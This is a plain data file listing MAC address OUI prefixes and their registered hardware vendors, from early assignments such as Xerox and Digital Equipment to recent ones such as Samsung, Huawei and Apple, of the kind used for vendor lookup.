Iriichi Technologies +0010E6 Applied Intelligent Systems +00101E Matsushita Electronic Instruments +0010F2 Antec +0010BE March Networks +006058 Copper Mountain Communications +00601B Mesa Electronics +0060FF QuVis +006056 Network Tools +0060D8 Elmic Systems +00607A DVS Gmbh +006097 3com +0060E3 Arbin Instruments +00E0FD A-trend Technology +00E0FB Leightronix +00E0D3 Datentechnik Gmbh +00E05E Japan Aviation Electronics Industry +00E0E5 Cinco Networks +00A0FD Scitex Digital Printing +00A0F5 Radguard +00A022 Centre FOR Development OF Advanced Computing +00A087 Microsemi +00A007 Apexx Technology +00A066 ISA +00A0AB Netcs Informationstechnik Gmbh +00A0D8 Spectra - TEK +00A01A Binar Elektronik AB +00A0E8 Reuters Holdings PLC +00A076 Cardware LAB +00A0A3 Reliable Power Meters +00A055 Data Device +00A065 Symantec +00A044 NTT IT +006008 3com +0060EF Flytech Technology +006098 HT Communications +0060F7 Datafusion Systems +0060DE Kayser-Threde GmbH +0060D0 Snmp Research Incorporated +006079 Mainstream Data +006020 Pivotal Networking +0005A8 Wyle Electronics +0060B7 Channelmatic +0060A3 Continuum Technology +006050 Internix +0060E0 Axiom Technology +0060A8 Tidomat AB +00A056 Micropross +00A051 Angia Communications. +00A0A6 M.I. Systems +00A05F BTG Electronics Design BV +00A094 Comsat +00A010 Syslogic Datentechnik AG +00A063 JRL Systems +00A08F Desknet Systems +00A0CC Lite-on Communications +00A090 TimeStep +00A0F7 V.I Computer +00A09C Xyplex +00A092 H. Bollmann Manufacturers +00A04D EDA Instruments +00A0DB Fisher & Paykel Production +00A0A5 Teknor Microsysteme +00A018 Creative Controllers +00A09F Commvision +00A06B DMS Dorsch Mikrosystem Gmbh +006051 Quality Semiconductor +00605E Liberty Technology Networking +0060C6 DCS AG +00609E ASC X3 - Information Technology Standards Secretariats +006084 Digital Video +00602D Alerton Technologies +006093 Varian +0060E2 Quest Engineering & Development +00A039 Ross Technology +00A06D Mannesmann Tally +00608E HE Electronics, Technologie & Systemtechnik Gmbh +0060F0 Johnson & Johnson Medical +0060D2 Lucent Technologies Taiwan Telecommunications +006077 Prisa Networks +0060AB Larscom Incorporated +0060E9 Atop Technologies +00608B ConferTech International +0060C3 Netvision +00A0A0 Compact DATA +00A024 3com +00A08B Aston Electronic Designs +00A0AA Spacelabs Medical +00A04F Ameritec +00A073 Com21 +00A084 Dataplex +00A034 Axel +00C0BC Telecom Australia/cssc +00C0EF Abit +00C03C Tower Tech S.r.l. +00C061 Solectek +00C074 Toyoda Automatic Loom +00C07F Nupon Computing +00C027 Cipher Systems +00C025 Dataproducts +00C022 Lasermaster Technologies +00C0E6 Verilink +00C05C Elonex PLC +00C0C1 Quad/graphics +00C091 Jabil Circuit +00C002 Sercomm +00C0F5 Metacomp +00C042 Datalux +00C089 Telindus Distribution +00C09D Distributed Systems Int'l +00C0A5 Dickens Data Systems +00C0E3 Ositech Communications +00C071 Areanex Communications +00C0AF Teklogix +00209F Mercury Computer Systems +0020B7 Namaqua Computerware +00201B Northern Telecom/network +0020C0 Pulse Electronics +00208D CMD Technology +0020DD Cybertec +0020BD Niobrara R & D +0020E6 Lidkoping Machine Tools AB +002047 Steinbrecher +0020B5 Yaskawa Electric +002072 Worklink Innovations +0020B8 Prime Option +002092 Chess Engineering +0020B9 Metricom +00206B Konica Minolta Holdings +0020FC Matrox +00C003 Globalnet Communications +00C0C3 Acuson Computed Sonography +00C04D Mitec +00C055 Modular Computing Technologies +00C067 United Barcode Industries +00C0B4 Myson Technology +00C080 Netstar +00C015 NEW Media +0070B3 Data Recall +00E6D3 Nixdorf Computer +00C083 Trace Mountain Products +00C005 Livingston Enterprises +00C0C8 Micro Byte +00C090 Praim S.r.l. +00C011 Interactive Computing Devices +00C0FD Prosum +00C041 Digital Transmission Systems +00C00F Quantum Software Systems +00C076 I-data International A-S +00C0C6 Personal Media +00C03B Multiaccess Computing +0020F4 Spectrix +00204E Network Security Systems +002027 Ming Fortune Industry +0020ED Giga-byte Technology +00200E Satellite Technology MGMT +002096 Invensys +0020BB ZAX +00204D Inovis Gmbh +002089 T3plus Networking +00205F Gammadata Computer Gmbh +002035 IBM +0020E2 Information Resource Engineering +002058 Allied Signal +002081 Titan Electronics +00201D Katana Products +0020CF Test & Measurement Systems +002043 Neuron Company Limited +002018 CIS Technology +002031 Tattile SRL +0020DE Japan Digital Laborat'yltd +0020F7 Cyberdata +0020EE Gtech +00208C Galaxy Networks +002063 Wipro Infotech +0020DC Densitron Taiwan +002078 Runtop +002042 Datametrics +0020F8 Carrera Computers +00200C Adastra Systems +0020C4 Inet +00C099 Yoshiki Industrial +00C0FC Elastic Reality +00C0D0 Ratoc System +00C07A Priva +000701 Racal-datacom +00C09C Hioki E.E. +00C004 Japan Business Computerltd +00C062 Impulse Technology +000267 Node Runner +002064 Protec Microsystems +002032 Alcatel Taisel +00207F Kyoei Sangyo +002077 Kardios Systems +002068 Isdyne +00202A N.V. Dzine +008006 Compuadd +0080EF Rational +0080C4 Document Technologies +008095 Basic Merton Handelsges.m.b.h. +008053 Intellicom +008026 Network Products +0080FE Azure Technologies +008028 Tradpost (hk) +0080B6 Themis Computer +0080C0 Penril Datacomm +0080F5 Quantel +00401D Invisible Software +0040BD Starlight Networks +00406D Lanco +00404D Telecommunications Techniques +0040A5 Clinicomp INTL. +004059 Yoshida Kogyo K. K. +004021 Raster Graphics +004081 Mannesmann Scangraphic Gmbh +00806C Cegelec Projects +00404A West Australian Department +00400A Pivotal Technologies +004032 Digital Communications +004042 N.a.t. Gmbh +0040C2 Applied Computing Devices +00403C Forks +0040C4 Kinkei System +0040D1 Fukuda Denshi +004024 Compac +0040B6 Computerm +00403F Ssangyong Computer Systems +004003 Emerson Process Management Power & Water Solutions +004090 Ansel Communications +00409A Network Express +0040DE Elsag Datamat spa +004063 VIA Technologies +00406C Copernique +0040DF Digalog Systems +004015 Ascom Infrasys AG +008056 Sphinx Electronics Gmbh & KG +008060 Network Interface +00805E LSI Logic +008093 Xyron +00C05D L&N Technologies +00C0E4 Siemens Building +00C01B Socket Communications +00C06E Haft Technology +00406F Sync Research +00401F Colorgraph +0040CF Strawberry TREE +0040F7 Polaroid +004037 Sea-ilan +0040CC Silcom Manuf'g Technology +004052 Star Technologies +00407A Societe D'exploitation DU Cnit +004089 Meidensha +00405A Goldstar Information & COMM. +00404C Hypertec +00C0CB Control Technology +00C09A Photonics +00C01A Corometrics Medical Systems +00404B Maple Computer Systems +004055 Metronix Gmbh +004045 Twinhead +00409D Digiboard +00401A Fuji Electric +0040B9 Macq Electronique SA +0040C7 Ruby Tech +004004 ICM +004070 Interware +008057 Adsoft +00807A Aitech Systems +0080AA Maxpeed +00C0E7 Fiberdata AB +00800A Japan Computer +00806E Nippon Steel +008010 Commodore International +0080DA Bruel & Kjaer Sound & Vibration Measurement A/S +0080BC Hitachi Engineering +008000 Multitech Systems +0080A1 Microtest +0080D0 Computer Peripherals +00807D Equinox Systems +008063 Hirschmann Automation and Control GmbH +00608C 3com +00804E Apex Computer Company +00800E Atlantix +00806F Onelan +008098 TDK +00809C Luxcom +008065 Cybergraphic Systems +008016 Wandel AND Goltermann +0080E6 Peer Networks +0080A2 Creative Electronic Systems +0080E0 XTP Systems +008050 Ziatech +0000E0 Quadram +000057 Scitex +0000D6 Punch Line Holding +0000C8 Altos Computer Systems +000098 Crosscomm +00007D Oracle +0000A2 Bay Networks +000038 CSS Labs +000061 Gateway Communications +000043 Micro Technology +0000E7 Star Gate Technologies +0000F3 Gandalf Data Limited +00002C Autotote Limited +00002A TRW - Sedd/inp +0000F1 Magna Computer +000083 Tadpole Technology PLC +000020 Dataindustrier Diab AB +00007A Dana Computer +00007C Ampere Incorporated +00008A Datahouse Information Systems +000068 Rosemount Controls +0000A8 Stratus Computer +0000DF Bell & Howell PUB SYS DIV +000062 Bull HN Information Systems +0000AD Bruker Instruments +0000D0 Develcon Electronics +000093 Proteon +008008 Dynatech Computer Systems +0080FF SOC. DE Teleinformatique RTC +000070 HCL Limited +00008E Solbourne Computer +0000DC Hayes Microcomputer Products +000024 Connect AS +008030 Nexus Electronics +008022 Scan-optics +000041 ICE +00001E Telsist Industria Electronica +00807B Artel Communications +00802E Castle Rock Computing +0080F9 Heurikon +008005 Cactus Computer +00801D Integrated Inference Machines +008015 Seiko Systems +008034 SMT Goupil +0080C9 Alberta Microelectronic Centre +00800B CSK +000016 DU Pont Pixel Systems +00005C Telematics International +0000AC Conware Computer Consulting +0000F2 Spider Communications +000030 VG Laboratory Systems +000035 Spectragraphics +020701 Racal-datacom +080011 Tektronix +080040 Ferranti Computer SYS. Limited +08003B Torus Systems Limited +08003D Cadnetix Corporations +080039 Spider Systems Limited +080030 Network Research +00009B Information International +00DD0F Ungermann-bass +000001 Xerox +080021 3M Company +AA0004 Digital Equipment +08000C Miklyn Development +00DD08 Ungermann-bass +0000A0 Sanyo Electric +08007F Carnegie-mellon University +080082 Veritas Software +08007B Sanyo Electric +00DD0C Ungermann-bass +000005 Xerox +0000AA Xerox +00406B Sysgen +AA0001 Digital Equipment +080001 Computervision +000053 Compucorp +08004B Planning Research +080003 Advanced Computer COMM. +080074 Casio Computer +08005E Counterpoint Computer +08005A IBM +080056 Stanford Linear Accel. Center +080053 Middle East TECH. University +08004F Cygnet Systems +00194B Sagemcom Broadband SAS +001F95 Sagemcom Broadband SAS +000E59 Sagemcom Broadband SAS +A01B29 Sagemcom Broadband SAS +90013B Sagemcom Broadband SAS +00235A Compal Information (kunshan) +001B38 Compal Information (kunshan) +E46F13 D-Link International +94C150 2Wire +60FE20 2Wire +989096 Dell +B82A72 Dell +00D09E 2Wire +000D72 2Wire +000F1F Dell +14FEB5 Dell +0015C5 Dell +D4AE52 Dell +B0E754 2Wire +B8E625 2Wire +549F35 Dell +64006A Dell +B4E10F Dell +0023AE Dell +9CD917 Motorola Mobility, a Lenovo Company +9068C3 Motorola Mobility, a Lenovo Company +408805 Motorola Mobility, a Lenovo Company +AC2B6E Intel Corporate +F8F1B6 Motorola Mobility, a Lenovo Company +00216A Intel Corporate +001E64 Intel Corporate +0016EB Intel Corporate +0018DE Intel Corporate +681729 Intel Corporate +5C514F Intel Corporate +B808CF Intel Corporate +C8F733 Intel Corporate +4851B7 Intel Corporate +5CC5D4 Intel Corporate +7CCCB8 Intel Corporate +F40669 Intel Corporate +3CA9F4 Intel Corporate +28B2BD Intel Corporate +08D40C Intel Corporate +843A4B Intel Corporate +0CD292 Intel Corporate +78929C Intel Corporate +6805CA Intel Corporate +ACA31E Aruba Networks +9C1C12 Aruba Networks +001A1E Aruba Networks +28C2DD AzureWave Technology +84D47E Aruba Networks +A85840 Cambridge Industries(Group) +002243 AzureWave Technology +74F06D AzureWave Technology +44D832 AzureWave Technology +781881 AzureWave Technology +B0EE45 AzureWave Technology +240A64 AzureWave Technology +D0E782 AzureWave Technology +0C4C39 MitraStar Technology +002423 AzureWave Technologies (Shanghai) +A81D16 AzureWave Technology +38A53C Comecer Netherlands +001D8B ADB Broadband Italia +A4526F ADB Broadband Italia +581243 AcSiP Technology +0026B8 Actiontec Electronics +0030F1 Accton Technology +001974 16063 +ECF00E AboCom +3039F2 ADB Broadband Italia +000827 ADB Broadband Italia +9097D5 Espressif +18FE34 Espressif +54F6C5 Fujian Star-net Communication +5C338E Alpha Networks +001AEB Allied Telesis R&D Center K.K. +A43111 ZIV +5C93A2 Liteon Technology +E8C74F Liteon Technology +E8F724 Hewlett Packard Enterprise +701A04 Liteon Technology +48D224 Liteon Technology +2CD05A Liteon Technology +74E543 Liteon Technology +A4DB30 Liteon Technology +B8EE65 Liteon Technology +001DBA Sony +000AD9 Sony Mobile Communications AB +000FDE Sony Mobile Communications AB +001EDC Sony Mobile Communications AB +001963 Sony Mobile Communications AB +001B59 Sony Mobile Communications AB +78843C Sony +0023F1 Sony Mobile Communications AB +3017C8 Sony Mobile Communications AB +18002D Sony Mobile Communications AB +04E676 Ampak Technology +0022F4 Ampak Technology +080046 Sony +000D92 Arima Communications +009096 Askey Computer +0011F5 Askey Computer +DCD87C Beijing Jingdong Century Trading +001C4A AVM GmbH +000B6A Asiarock Technology Limited +40BA61 Arima Communications +1883BF Arcadyan Technology +9C80DF Arcadyan Technology +001CCC BlackBerry RTS +94EBCD BlackBerry RTS +644FB0 Hyunjin.com +001A2A Arcadyan Technology +001D19 Arcadyan Technology +88252C Arcadyan Technology +A4E4B8 BlackBerry RTS +58671A Barnes&Noble +BC0543 AVM GmbH +002675 Aztech Electronics Pte +001F3F AVM GmbH +0020D6 Breezecom +001018 Broadcom +001BE9 Broadcom +008077 Brother industries +029D8E Cardiac Recorders +FC2F40 Calxeda +0026E4 Canal + +389496 Samsung Electronics +0CB319 Samsung Electronics +08EE8B Samsung Electronics +A89FBA Samsung Electronics +FC1910 Samsung Electronics +083D88 Samsung Electronics +5C2E59 Samsung Electronics +646CB2 Samsung Electronics +F884F2 Samsung Electronics +14B484 Samsung Electronics +608F5C Samsung Electronics +4CBCA5 Samsung Electronics +78595E Samsung Electronics +B0D09C Samsung Electronics +4CA56D Samsung Electronics +A48431 Samsung Electronics +E4F8EF Samsung Electronics +1432D1 Samsung Electronics +E458E7 Samsung Electronics +8CBFA6 Samsung Electronics +7840E4 Samsung Electronics +9000DB Samsung Electronics +183A2D Samsung Electronics +08373D Samsung Electronics +50F520 Samsung Electronics +A4EBD3 Samsung Electronics +28987B Samsung Electronics +F40E22 Samsung Electronics +9C3AAF Samsung Electronics +BCF2AF devolo AG +0270B3 Data Recall +000FF6 Darfon Lighting +702559 CyberTAN Technology +0090D6 Crystal Group +001DAA DrayTek +02CF1C Communication Machinery +0C75BD Cisco Systems +38F0C8 Livestream +0C1167 Cisco Systems +001982 SmarDTV +10C6FC Garmin International +00E000 Fujitsu Limited +00000E Fujitsu Limited +002326 Fujitsu Limited +0007CB Freebox SAS +3C591E TCL King Electrical Appliances (Huizhou) +002682 Gemtek Technology +001A73 Gemtek Technology +00904B Gemtek Technology +D86BF7 Nintendo +A4C0E1 Nintendo +34AF2C Nintendo +8CCDE8 Nintendo +9CE635 Nintendo +600194 Espressif +F44D17 Goldcard High-tech +001E35 Nintendo +001FC5 Nintendo +0021BD Nintendo +002709 Nintendo +E84ECE Nintendo +0009BF Nintendo +001AE9 Nintendo +001CBE Nintendo +002403 Nokia Danmark A/S +002265 Nokia Danmark A/S +0019B7 Nokia Danmark A/S +002404 Nokia Danmark A/S +0002EE Nokia Danmark A/S +001C9A Nokia Danmark A/S +001F01 Nokia Danmark A/S +000EED Nokia Danmark A/S +001E3A Nokia Danmark A/S +001A89 Nokia Danmark A/S +0021AA Nokia Danmark A/S +002669 Nokia Danmark A/S +0022FD Nokia Danmark A/S +002109 Nokia Danmark A/S +002108 Nokia Danmark A/S +001D6E Nokia Danmark A/S +001B33 Nokia Danmark A/S +ECF35B Nokia +EC9B5B Nokia +BCC6DB Nokia +B83241 Wuhan Tianyu Information Industry +9897D1 MitraStar Technology +94C960 Zhongshan B&T technology.co. +001479 NEC Magnus Communications +9C4FDA Apple +1C5CF2 Apple +0821EF Samsung Electronics +A0CBFD Samsung Electronics +34145F Samsung Electronics +B462AD Elysia Germany GmbH +747818 Jurumani Solutions +803896 Sharp +80D160 Integrated Device Technology (Malaysia) Sdn. Bhd. +686E23 Wi3 +B8A175 Roku +0080E5 NetApp +E49A79 Apple +28A02B Apple +B44BD2 Apple +002340 MiXTelematics +B48B19 Apple +00AF1F Cisco Systems +4CCC6A Micro-star Intl +985BB0 Kmdata +6C8FB5 Microsoft Mobile Oy +245EBE Qnap Systems +A89352 Shanghai Zhongmi Communication Technology +AC5F3E Samsung Electro-mechanics(thailand) +70661B Sonova AG +1C98EC Hewlett Packard Enterprise +9C9D5D Raden +E8FD72 Shanghai Linguo Technology +98BB1E BYD Precision Manufacture Company +EC438B Yaptv +1866DA Dell +981FB1 Shenzhen Lemon Network Technology +40476A AG Acquisition D.b.a. Astro Gaming +A4BF01 Intel Corporate +509EA7 Samsung Electronics +DCCF96 Samsung Electronics +0004C6 Yamaha Motor +14D11F Huawei Technologies +54511B Huawei Technologies +68536C SPnS +005BA1 shanghai huayuan chuangxin software +B07E70 Zadara Storage +405EE1 Shenzhen H&T Intelligent Control +10F005 Intel Corporate +D463FE Arcadyan +9466E7 WOM Engineering +F8A188 LED Roadway Lighting +001174 Mojo Networks +BC15AC Vodafone Italia +140C5B PLNetworks +D0B0CD Moen +0071C2 Pegatron +DCFE07 Pegatron +E47E66 Huawei Technologies +9C741A Huawei Technologies +EC93ED DDoS-Guard +4C72B9 Pegatron +F462D0 Not for Radio +94513D iSmart Alarm +C89CDC Elitegroup Computer Systems +002511 Elitegroup Computer Systems +000E03 Emulex +001BB9 Elitegroup Computer Systems +001921 Elitegroup Computer Systems +00142A Elitegroup Computer Systems +0001F4 Enterasys +487ADA Hangzhou H3C Technologies, Limited +1C7370 Neotech +200A5E Xiangshan Giant Eagle Technology Developing +30E37A Intel Corporate +4CA003 T-21 Technologies +F0EE58 Pace Telematics Gmbh +A08CFD Hewlett Packard +4000E0 Derek(Shaoguan)Limited +001397 Oracle +00A0A4 Oracle +A4E597 Gessler GmbH +0024F4 Kaminario +001D08 Jiangsu Yinhe Electronics +0018D7 Javad GNSS +001C6C 30805 +00A0B0 I-O Data Device +00E0CF Integrated Device +547F54 Ingenico +48C049 Broad Telecom SA +DC38E1 Juniper Networks +40A677 Juniper Networks +0C8610 Juniper Networks +EC3EF7 Juniper Networks +0014F6 Juniper Networks +00121E Juniper Networks +0010DB Juniper Networks +307C5E Juniper Networks +841888 Juniper Networks +40B4F0 Juniper Networks +002688 Juniper Networks +0017CB Juniper Networks +E0A3AC Huawei Technologies +E00EDA Cisco Systems +6C2483 Microsoft Mobile Oy +848319 Hangzhou Zero Zero Technology +001F20 Logitech Europe SA +882012 LMI Technologies +002382 Lih Rong electronic Enterprise +88795B Konka Group +001A34 Konka Group +20A90E TCT mobile +8C99E6 TCT mobile +745C9F TCT mobile +0CBD51 TCT mobile +E42D02 TCT mobile +3CE5A6 Hangzhou H3C Technologies, Limited +3C8C40 Hangzhou H3C Technologies, Limited +B04519 TCT mobile +A81559 Breathometer +ECADB8 Apple +9801A7 Apple +2CF0A2 Apple +C09727 Samsung Electro-mechanics(thailand) +2C5A8D Systronik Elektronik u. Systemtechnik Gmbh +8C897A Augtek +54EDA3 Navdy +046565 Testop +042758 Huawei Technologies +3C92DC Octopod Technology +6038E0 Belkin International +F0FDA0 Acurix Networks +3876D1 Euronda SpA +C48F07 Shenzhen Yihao Hulian Science and Technology +009E1E Cisco Systems +002550 Riverbed Technology +D85B2A Samsung Electronics +ACC33A Samsung Electronics +F45B73 Wanjiaan Interconnected Technology +0021E2 visago Systems & Controls GmbH & KG +28F10E Dell +C4A366 zte +0014B4 General Dynamics United Kingdom +A0B437 GD Mission Systems +5052D2 Hangzhou Telin Technologies, Limited +1CD6BD Leedarson Lighting +9CDD1F Intelligent Steward +00EBD5 Cisco Systems +1C7B23 Qingdao Hisense Communications +1C740D ZyXEL Communications +001349 ZyXEL Communications +404A03 ZyXEL Communications +CC5D4E ZyXEL Communications +A0E4CB ZyXEL Communications +90CF7D Qingdao Hisense Communications +F8F082 NAG +40F413 Rubezh +2C094D Raptor Engineering +88797E Motorola Mobility, a Lenovo Company +40C729 Sagemcom Broadband SAS +AC040B Peloton Interactive +006074 QSC +34ED0B Shanghai XZ-COM.CO. +0010C1 OI Electric +4432C8 Technicolor CH USA +E0885D Technicolor CH USA +802994 Technicolor CH USA +206A8A Wistron Infocomm (Zhongshan) +F0DEF1 Wistron Infocomm (Zhongshan) +F80F41 Wistron Infocomm (Zhongshan) +94DF4E Wistron InfoComm(Kunshan)Co. +48A9D2 Wistron Neweb +683E34 Meizu Technology +001EC0 Microchip Technology +3C0771 Sony +D8D43C Sony +00A012 Telco Systems +94611E Wata Electronics +0025D4 General Dynamics Mission Systems +5CA86A Huawei Technologies +C8778B Themis Computer +000A68 Solarflare Communications +0CD502 Westell Technologies +001636 Quanta Computer +00C09F Quanta Computer +54AB3A Quanta Computer +089E01 Quanta Computer +00199D Vizio +6C0B84 Universal Global Scientific Industrial +E4509A HW Communications +702900 Shenzhen ChipTrip Technology +204C03 Aruba Networks +90F052 Meizu Technology +000E1E QLogic +D8EB97 Trendnet +146102 Alpine Electronics +9003B7 Parrot SA +0CFE45 Sony Interactive Entertainment +F8D0AC Sony Interactive Entertainment +00D9D1 Sony Interactive Entertainment +00041F Sony Interactive Entertainment +001D0D Sony Interactive Entertainment +7CC709 Shenzhen Rf-link Technology +38B8EB Ieee Registration Authority +38FDFE Ieee Registration Authority +7C477C Ieee Registration Authority +50FF99 Ieee Registration Authority +6891D0 Ieee Registration Authority +283638 Ieee Registration Authority +2C6A6F Ieee Registration Authority +BC3400 Ieee Registration Authority +B437D1 Ieee Registration Authority +D455BE Shenzhen Fast Technologies +F40E11 Ieee Registration Authority +A43BFA Ieee Registration Authority +CC1BE0 Ieee Registration Authority +807B85 Ieee Registration Authority +549A11 Ieee Registration Authority +B8D812 Ieee Registration Authority +1CCAE3 Ieee Registration Authority +7419F8 Ieee Registration Authority +1C21D1 Ieee Registration Authority +80E4DA Ieee Registration Authority +2CD141 Ieee Registration Authority +8CA6DF TP-Link Technologies +00E091 LG Electronics +6CD032 LG Electronics +C041F6 LG Electronics +404AD4 Widex A/S +0022CF Planex Communications +A84E3F Hitron Technologies. +00A742 Cisco Systems +001478 TP-Link Technologies +00167A Skyworth Overseas Development +28BE03 TCT mobile +F4C613 Alcatel-Lucent Shanghai Bell +D826B9 Guangdong Coagent Electronics S&T +FCB0C4 Shanghai DareGlobal Technologies +24AF4A Alcatel-Lucent IPD +001AF0 Alcatel-Lucent IPD +AC9CE4 Alcatel-Lucent Shanghai Bell +D84710 Sichuan Changhong Electric +000E40 Nortel Networks +001158 Nortel Networks +0011F9 Nortel Networks +000F6A Nortel Networks +001283 Nortel Networks +000438 Nortel Networks +002347 ProCurve Networking by HP +002561 ProCurve Networking by HP +008058 Printer Systems +00140D Nortel Networks +001765 Nortel Networks +0018B0 Nortel Networks +001B25 Nortel Networks +001DAF Nortel Networks +00166D Yulong Computer Telecommunication Scientific (Shenzhen) +0016F2 Dmobile System +000138 XAVi Technologies +3C9157 Yulong Computer Telecommunication Scientific (Shenzhen) +0000D8 Novell +001087 Xstreamis PLC +7C0623 Ultra Electronics Sonar System Division +002555 Visonic Technologies 1993 +48FD8E Huawei Technologies +244427 Huawei Technologies +B4A984 Symantec +34074F AccelStor +58E876 Ieee Registration Authority +248A07 Mellanox Technologies +00258B Mellanox Technologies +3C2DB7 Texas Instruments +0023D4 Texas Instruments +001831 Texas Instruments +D08CB5 Texas Instruments +B4EED4 Texas Instruments +CC8CE3 Texas Instruments +102EAF Texas Instruments +647BD4 Texas Instruments +0017E8 Texas Instruments +0017E6 Texas Instruments +B0B448 Texas Instruments +505663 Texas Instruments +3C7DB1 Texas Instruments +40984E Texas Instruments +0012D1 Texas Instruments +88C255 Texas Instruments +E0C79D Texas Instruments +9059AF Texas Instruments +B4994C Texas Instruments +70FF76 Texas Instruments +507224 Texas Instruments +506583 Texas Instruments +BC282C e-Smart Systems Pvt. +546C0E Texas Instruments +F85C4D Nokia +D8E72B NetScout Systems +04FEA1 Fihonest communication +2CAC44 Conextop +A8BD27 Hewlett Packard Enterprise +981E0F Jeelan (Shanghai Jeelan Technology Information +548CA0 Liteon Technology +001CA8 AirTies Wireless Networks +0017D5 Samsung Electronics +001247 Samsung Electronics +E4121D Samsung Electronics +684898 Samsung Electronics +F409D8 Samsung Electro-mechanics(thailand) +B479A7 Samsung Electro-mechanics(thailand) +002339 Samsung Electronics +D487D8 Samsung Electronics +184617 Samsung Electronics +5001BB Samsung Electronics +380A94 Samsung Electronics +D857EF Samsung Electronics +1C66AA Samsung Electronics +58C38B Samsung Electronics +001EE2 Samsung Electronics +001C43 Samsung Electronics +001D25 Samsung Electronics +3C5A37 Samsung Electronics +549B12 Samsung Electronics +3C8BFE Samsung Electronics +00265D Samsung Electronics +D4E8B2 Samsung Electronics +0808C2 Samsung Electronics +B0C4E7 Samsung Electronics +D890E8 Samsung Electronics +34AA8B Samsung Electronics +24C696 Samsung Electronics +181EB0 Samsung Electronics +20D390 Samsung Electronics +343111 Samsung Electronics +34BE00 Samsung Electronics +78521A Samsung Electronics +18D276 Huawei Technologies +7825AD Samsung Electronics +F4D9FB Samsung Electronics +0017C9 Samsung Electronics +00166B Samsung Electronics +00166C Samsung Electronics +E47CF9 Samsung Electronics +90187C Samsung Electro Mechanics +FC1F19 Samsung Electro Mechanics +50CCF8 Samsung Electro Mechanics +980C82 Samsung Electro Mechanics +002119 Samsung Electro Mechanics +002454 Samsung Electronics +20D5BF Samsung Electronics +30CDA7 Samsung Electronics +5C0A5B Samsung Electro Mechanics +543530 Hon Hai Precision Ind. +300ED5 Hon Hai Precision Ind. +D02788 Hon Hai Precision Ind. +0014A4 Hon Hai Precision Ind. +0016CE Hon Hai Precision Ind. +001DD9 Hon Hai Precision Ind. +001FE2 Hon Hai Precision Ind. +002269 Hon Hai Precision Ind. +40490F Hon Hai Precision Ind. +28565A Hon Hai Precision Ind. +001F3A Hon Hai Precision Ind. +506313 Hon Hai Precision Ind. +78E400 Hon Hai Precision Ind. +8C7CB5 Hon Hai Precision Ind. +EC55F9 Hon Hai Precision Ind. +C03896 Hon Hai Precision Ind. +2C337A Hon Hai Precision Ind. +ACD1B8 Hon Hai Precision Ind. +48E244 Hon Hai Precision Ind. +30F772 Hon Hai Precision Ind. +90489A Hon Hai Precision Ind. +9439E5 Hon Hai Precision Ind. +5C8613 Beijing Zhoenet Technology +C8B21E Chipsea Technologies (shenzhen) +503F98 Cmitech +B072BF Murata Manufacturing +600B03 Hangzhou H3C Technologies, Limited +A41437 Hangzhou Hikvision Digital Technology +884CCF Pulzze Systems +38521A Nokia +84DBFC Nokia +143E60 Nokia +D4E33F Nokia +5454CF Probedigital +F0D5BF Intel Corporate +C87E75 Samsung Electronics +00233A Samsung Electronics +1C9D3E Integrated Device Technology (Malaysia) Sdn. Bhd. +748A69 Korea Image Technology +30B64F Juniper Networks +DC0D30 Shenzhen Feasycom Technology +008731 Cisco Systems +B4EFFA Lemobile Information Technology (Beijing) +9495A0 Google +0005EE Vanderbilt International (SWE) AB +38D547 Asustek Computer +383A21 Ieee Registration Authority +4CF95D Huawei Technologies +8421F1 Huawei Technologies +707990 Huawei Technologies +CCFD17 TCT mobile +3C8BCD Alcatel-Lucent Shanghai Bell +E43ED7 Arcadyan +248894 shenzhen lensun Communication Technology +60A4D0 Samsung Electronics +00B0CE Viveris Technologies +E00DB9 Cree +40FE0D Maxio +609AC1 Apple +F07960 Apple +9C8BA0 Apple +9840BB Dell +E04FBD Sichuan Tianyi Comheart Telecomco. +00B0E1 Cisco Systems +4C3275 Apple +0006F4 Prime Electronics & Satellitics +ACE77B Sichuan Tianyi Comheart Telecomco. +24A43C Ubiquiti Networks +D4E90B CVT +788A20 Ubiquiti Networks +28EE52 TP-Link Technologies +905C44 Compal Broadband Networks +FC372B Sichuan Tianyi Comheart Telecomco. +0CD86C Shenzhen Fast Technologies +4CE173 Ieee Registration Authority +8C60E7 Mpgio +2C0E3D Samsung Electro-mechanics(thailand) +24C44A zte +B83A9D Alarm.com +00BBC1 Canon +1C14B3 Airwire Technologies +2CC260 Oracle +407183 Juniper Networks +0059DC Cisco Systems +ACF85C Private +1CC0E1 Ieee Registration Authority +00749C Ruijie Networks +00271C Mercury +E0D9E3 Eltex Enterprise +5098F3 Rheem Australia +701CE7 Intel Corporate +CC9470 Kinestral Technologies +F0219D Cal-Comp Electronics & Communications Company +000B2E Cal-Comp Electronics & Communications Company +885BDD Aerohive Networks +08EA44 Aerohive Networks +506B8D Nutanix +0038DF Cisco Systems +006BF1 Cisco Systems +CC81DA Shanghai Phicomm Communication +20D25F SmartCap Technologies +3CFA43 Huawei Technologies +145F94 Huawei Technologies +4C11BF Zhejiang Dahua Technology +EC0D9A Mellanox Technologies +000064 Yokogawa Digital Computer +0023F7 Private +90D7BE Wavelab Global +686975 Angler Labs +002448 SpiderCloud Wireless +7C03C9 Shenzhen Youhua Technology +64DB43 Motorola (Wuhan) Mobility Technologies Communication +D058A8 zte +D071C4 zte +48F07B Alps Electric +3C80AA Ransnet Singapore Pte +7CEBAE Ridgeline Instruments +E89EB4 Hon Hai Precision Ind. +D4970B Xiaomi Communications +64CC2E Xiaomi Communications +B0E235 Xiaomi Communications +38A4ED Xiaomi Communications +F48B32 Xiaomi Communications +0060BD Enginuity Communications +AC83F3 Ampak Technology +18DBF2 Dell +000048 Seiko Epson +C0BFC0 Huawei Technologies +A08CF8 Huawei Technologies +54B56C Xi'an NovaStar Tech +FC3CE9 Tsingtong Technologies +04B648 Zenner +FC10C6 Taicang T&W Electronics +344CC8 Echodyne +948FEE Verizon Telematics +5C4A1F Sichuan Tianyi Comheart Telecomco. +0C8DDB Cisco Meraki +B0F963 Hangzhou H3C Technologies, Limited +E4E4AB Apple +58404E Apple +DC0C5C Apple +2C200B Apple +98B6E9 Nintendo +8809AF Masimo +00E06C Ultra Electronics Command & Control Systems +009058 Ultra Electronics Command & Control Systems +F8983A Leeman International (HongKong) Limited +4CECEF Soraa +702D84 i4C Innovations +CC9F7A Chiun Mai Communication Systems +446246 Comat AG +C8AA55 Hunan Comtom Electronic Incorporated +142FFD LT Security +000D2C Net2Edge Limited +ECE154 Beijing Unisound Information Technology +60C658 Phytronix +38454C Light Labs +C894BB Huawei Technologies +D0FF98 Huawei Technologies +5004B8 Huawei Technologies +10B1F8 Huawei Technologies +14ABC5 Intel Corporate +A462DF DS Global. +50D213 CviLux +44D437 Inteno 